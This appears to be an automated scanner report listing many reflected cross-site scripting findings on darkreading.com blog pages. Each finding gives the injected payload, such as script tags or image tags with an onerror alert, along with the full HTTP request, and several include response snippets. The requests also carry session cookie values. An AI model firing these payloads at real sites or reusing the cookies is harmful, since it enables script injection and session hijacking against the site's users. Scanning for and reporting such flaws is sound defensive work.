This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700991d1a71"><a>7e18c0860cf/top-excuses-for-foregoing-security-monitoring-logging.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff30b"><a>10354fa61dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.htmlff30b"><a>10354fa61dc HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c231'><img%20src%3da%20onerror%3dalert(1)>4f1eb94ea3a was submitted in the REST URL parameter 3. This input was echoed as 4c231'><img src=a onerror=alert(1)>4f1eb94ea3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html4c231'><img%20src%3da%20onerror%3dalert(1)>4f1eb94ea3a HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
3.304. http://www.darkreading.com/blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52679"><script>alert(1)</script>de277bf410a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html?52679"><script>alert(1)</script>de277bf410a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3ce0"><a>70f6f182464 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227700998c3ce0"><a>70f6f182464/blocking-zero-days-with-emet-2-0.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f6a74'><img%20src%3da%20onerror%3dalert(1)>177bc2dd7e6 was submitted in the REST URL parameter 3. This input was echoed as f6a74'><img src=a onerror=alert(1)>177bc2dd7e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227700998/blocking-zero-days-with-emet-2-0.htmlf6a74'><img%20src%3da%20onerror%3dalert(1)>177bc2dd7e6 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac76"><a>ae64a4be08b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227700998/blocking-zero-days-with-emet-2-0.html4ac76"><a>ae64a4be08b HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40238"><a>d7b0ff2af28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22790000240238"><a>d7b0ff2af28/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1aaae'><img%20src%3da%20onerror%3dalert(1)>9fe1775f6aa was submitted in the REST URL parameter 3. This input was echoed as 1aaae'><img src=a onerror=alert(1)>9fe1775f6aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html1aaae'><img%20src%3da%20onerror%3dalert(1)>9fe1775f6aa HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621cd"><a>3961621e973 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html621cd"><a>3961621e973 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>More on C ...[SNIP]... ow-hanging-fruit.html621cd%22%3E%3Ca%3E3961621e973&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html621cd"><a>3961621e973"> ...[SNIP]...
3.311. http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c2a"><script>alert(1)</script>22f4f0bd3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html?51c2a"><script>alert(1)</script>22f4f0bd3a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>More on C ...[SNIP]... cript%3Ealert%281%29%3C%2Fscript%3E22f4f0bd3a%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html?51c2a"><script>alert(1)</script>22f4f0bd3a=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf62"><a>15b19048d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/227900004eaf62"><a>15b19048d/hp-and-the-scary-corporate-fifth-column-concept.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8ce44'><img%20src%3da%20onerror%3dalert(1)>62fa8fcc532 was submitted in the REST URL parameter 3. This input was echoed as 8ce44'><img src=a onerror=alert(1)>62fa8fcc532 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html8ce44'><img%20src%3da%20onerror%3dalert(1)>62fa8fcc532 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e0a0"><img%20src%3da%20onerror%3dalert(1)>7938918e8d1 was submitted in the REST URL parameter 3. This input was echoed as 4e0a0"><img src=a onerror=alert(1)>7938918e8d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html4e0a0"><img%20src%3da%20onerror%3dalert(1)>7938918e8d1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>SIP Trunk ...[SNIP]... <a href="http://www.darkreading.com/blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html4e0a0"><img src=a onerror=alert(1)>7938918e8d1?fmid=15821"> ...[SNIP]...
3.315. http://www.darkreading.com/blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec0e0"><script>alert(1)</script>07c509ed648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html?ec0e0"><script>alert(1)</script>07c509ed648=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427f6"><a>4f8b078a27d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/228200587427f6"><a>4f8b078a27d/cookies-social-media-and-firesheep.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42569'><img%20src%3da%20onerror%3dalert(1)>d31f03dcc47 was submitted in the REST URL parameter 3. This input was echoed as 42569'><img src=a onerror=alert(1)>d31f03dcc47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/228200587/cookies-social-media-and-firesheep.html42569'><img%20src%3da%20onerror%3dalert(1)>d31f03dcc47 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e8d"><a>34aa7d0cb46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/228200587/cookies-social-media-and-firesheep.html71e8d"><a>34aa7d0cb46 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Cookies, ...[SNIP]... F228200587%2Fcookies-social-media-and-firesheep.html71e8d%22%3E%3Ca%3E34aa7d0cb46&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/228200587/cookies-social-media-and-firesheep.html71e8d"><a>34aa7d0cb46"> ...[SNIP]...
3.319. http://www.darkreading.com/blog/228200587/cookies-social-media-and-firesheep.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be117"><script>alert(1)</script>d8722931d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228200587/cookies-social-media-and-firesheep.html?be117"><script>alert(1)</script>d8722931d9=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7859"><a>5a8a63d1192 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/228200589e7859"><a>5a8a63d1192/nosql-not-much-anyway.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b850c'><img%20src%3da%20onerror%3dalert(1)>a080f2bcc37 was submitted in the REST URL parameter 3. This input was echoed as b850c'><img src=a onerror=alert(1)>a080f2bcc37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/228200589/nosql-not-much-anyway.htmlb850c'><img%20src%3da%20onerror%3dalert(1)>a080f2bcc37 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8eb3"><a>da6dde6be11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/228200589/nosql-not-much-anyway.htmld8eb3"><a>da6dde6be11 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>NoSQL: No ...[SNIP]... w.darkreading.com%2Fblog%2F228200589%2Fnosql-not-much-anyway.htmld8eb3%22%3E%3Ca%3Eda6dde6be11&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/228200589/nosql-not-much-anyway.htmld8eb3"><a>da6dde6be11"> ...[SNIP]...
3.323. http://www.darkreading.com/blog/228200589/nosql-not-much-anyway.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/228200589/nosql-not-much-anyway.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6728"><script>alert(1)</script>600e20ee155 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228200589/nosql-not-much-anyway.html?f6728"><script>alert(1)</script>600e20ee155=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31801"><a>17e62804bd5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22820102031801"><a>17e62804bd5/larry-ellison-s-mistress-and-security-as-a-blame-game.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 361e8"><a>61c9a3014cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html361e8"><a>61c9a3014cb HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 144d4'><img%20src%3da%20onerror%3dalert(1)>1b7007f2fcc was submitted in the REST URL parameter 3. This input was echoed as 144d4'><img src=a onerror=alert(1)>1b7007f2fcc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html144d4'><img%20src%3da%20onerror%3dalert(1)>1b7007f2fcc HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
3.327. http://www.darkreading.com/blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd1c"><script>alert(1)</script>2d94ce184d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html?2dd1c"><script>alert(1)</script>2d94ce184d1=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Larry Ell ...[SNIP]... c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2d94ce184d1%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html?2dd1c"><script>alert(1)</script>2d94ce184d1=1"> ...[SNIP]...
3.328. http://www.darkreading.com/blog/228600139/avast-ye-pirates-it-s-free.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/blog/228600139/avast-ye-pirates-it-s-free.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28b36"><script>alert(1)</script>34dcd0199b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/228600139/avast-ye-pirates-it-s-free.html?28b36"><script>alert(1)</script>34dcd0199b=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45abd"><a>becafe9f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/22880018845abd"><a>becafe9f078/the-hazards-of-bot-volunteerism.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 780c4'><img%20src%3da%20onerror%3dalert(1)>81855cecc83 was submitted in the REST URL parameter 3. This input was echoed as 780c4'><img src=a onerror=alert(1)>81855cecc83 in the application's response.
